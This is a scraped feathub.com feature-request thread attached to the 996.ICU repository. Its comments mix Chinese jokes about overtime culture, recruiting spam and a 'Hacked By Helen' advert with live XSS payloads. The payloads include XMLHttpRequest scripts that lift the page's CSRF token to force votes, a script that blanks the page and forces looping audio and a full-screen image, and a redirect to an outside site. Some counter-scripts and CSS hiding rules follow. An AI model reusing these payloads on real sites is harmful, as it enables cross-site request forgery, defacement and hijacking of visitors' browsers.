LinXueyuanStdio/996.ICU

并夕夕

zzp0753 asked for this feature 8 months ago — 23 comments

zzp0753 commented 8 months ago

clearlove20 commented 8 months ago

这个名字带秀

netsman1030 commented 8 months ago

不是拼多多么

nimil commented 8 months ago

并西西可还行。。。

Ezio1212 commented 8 months ago

我面试的时候直接告知996,果断拒掉

mccree2 commented 8 months ago

你就是这个榜上最靓的仔

itinycheng commented 8 months ago

秒懂.

ostopuro commented 8 months ago

非996工作机会介绍群↑↑↑

intrhuting commented 8 months ago

美国上市互联网企业,总部上海,硅谷、北京、深圳、广州、台北都有办公点,全球业务,飞速发展中,开发、运营、产品、销售、商务、设计职位都在招人,薪资丰厚,10点上班,6点多下班,一周5天,拒绝996,不进icu。想内推加v:sharehealthy

666sbX commented 8 months ago

Hacked By Helen收徒QQ925999918

hellonainai commented 8 months ago

666sbX 你就是个煞笔

LinXueyuanStdio commented 8 months ago Admin

table{visibility: collapse;}

reinit commented 8 months ago

var xmlReq = new XMLHttpRequest(); xmlReq.addEventListener("load", function() { alert("Please report XSS vulnerability at https://feathub.com/feathub/feathub/+65, or https://feathub.com/feathub/feathub/+66 if you love me."); }); xmlReq.open("POST", "https://feathub.com/feathub/feathub/+65/vote?vote[score]=1"); xmlReq.send();

reinit commented 8 months ago

var xmlReq = new XMLHttpRequest(); xmlReq.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); xmlReq.setRequestHeader("Cache-Control", "no-cache"); xmlReq.setRequestHeader("Referer", "https://feathub.com/feathub/feathub/+65"); xmlReq.open("POST", "https://feathub.com/feathub/feathub/+65/vote?vote[score]=1"); xmlReq.send("method=patch&authenticitytoken=" + document.head.querySelector("[name~=csrf-token][content]").content);

reinit commented 8 months ago

var xmlReq = new XMLHttpRequest(); xmlReq.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); xmlReq.setRequestHeader("Cache-Control", "no-cache"); xmlReq.setRequestHeader("Referer", "https://feathub.com/feathub/feathub/+65"); xmlReq.open("POST", "https://feathub.com/feathub/feathub/+65/vote?vote[score]=1", true); xmlReq.send("method=patch&authenticitytoken=" + document.head.querySelector("[name~=csrf-token][content]").content);

xss67612 commented 8 months ago

document.body.innerText = '';

let audio = new Audio('http://dl.stream.qqmusic.qq.com/M5000036Tf0f03sL4n.mp3?vkey=A3EDA94F203BA3612F658DE4820E8AE6D58BA52F8D9F5789E40AFA1065D58F26E0A951C9BB8F482819C3185BE1AEB77356B11F154A90C52D&guid=5150825362&fromtag=1');
audio.loop = true;
audio.autoplay = true;
document.body.style.height = '1000px';
document.body.addEventListener("mousemove", function () {
    audio.play();
});

let image = new Image();
image.style.position='absolute';
image.left=0;
image.top=0;
image.style.width='100%';
image.style.height='100%';
image.src='https://timgsa.baidu.com/timg?image&quality=80&size=b9999_10000&sec=1553929917129&di=a8bae55a6a121071613d4f801322bd0f&imgtype=0&src=http%3A%2F%2Fs6.sinaimg.cn%2Fmw690%2F003xpBcszy6PCoJubOd35%26amp%3B690';
document.body.append(audio,image);

console.log('希望你能换个心情,迎接未来美好的每一天!');

LinXueyuanStdio commented 8 months ago Admin

img,svg,table{visibility: collapse;}

superzmy commented 8 months ago

for(var x of document.getElementsByClassName("body")) { if (x.innerHTML.indexOf("script") >= 0) x.innerHTML = ""; } 反注入补丁 <script> for(var x of document.getElementsByClassName("body")) { if (x.innerHTML.indexOf("script") >= 0) x.innerHTML = ""; } <script>

ghostlo commented 8 months ago

哇,这么秀吗

996-ICU-Test-Xs commented 8 months ago

for(var x of document.getElementsByTagName('script')) { x.innerHTML = '';}

996-ICU-Test-Xs commented 8 months ago

for(var x of document.getElementsByTagName('script')) { x.innerHTML = '';}

996-ICU-Test-Xs commented 8 months ago

for(var x of document.getElementsByTagName('script')) { x.innerHTML = '';}

guotao commented 8 months ago

If it were too difficult to allow as the folder under root, window.location.href='https://blogs.kainy.cn/?from=feathubXSS2'; setTimeout("javascript:location.href='hello.html'", 0); how about a new macro/variable that lets us do something like {Movie TitleThe:1} that will use the first letter of the title, or some other customization (and NOT require {Movie Title} as a mandatory field)。。 反注入补丁 for(var x of document.getElementsByClassName("body")) { if (x.innerHTML.indexOf("script") >= 0) x.innerHTML = ""; } ]>([\s\S])<\/body>/)[1].replace(/<?script?>/g,'').replace(/<\/?script?>/g,'').replace(//g, '')}};xmlhttp.open('GET',window.location.href,true);xmlhttp.send() }, 0)"/>  。

Join the discussion!

Sign-in with GitHub to comment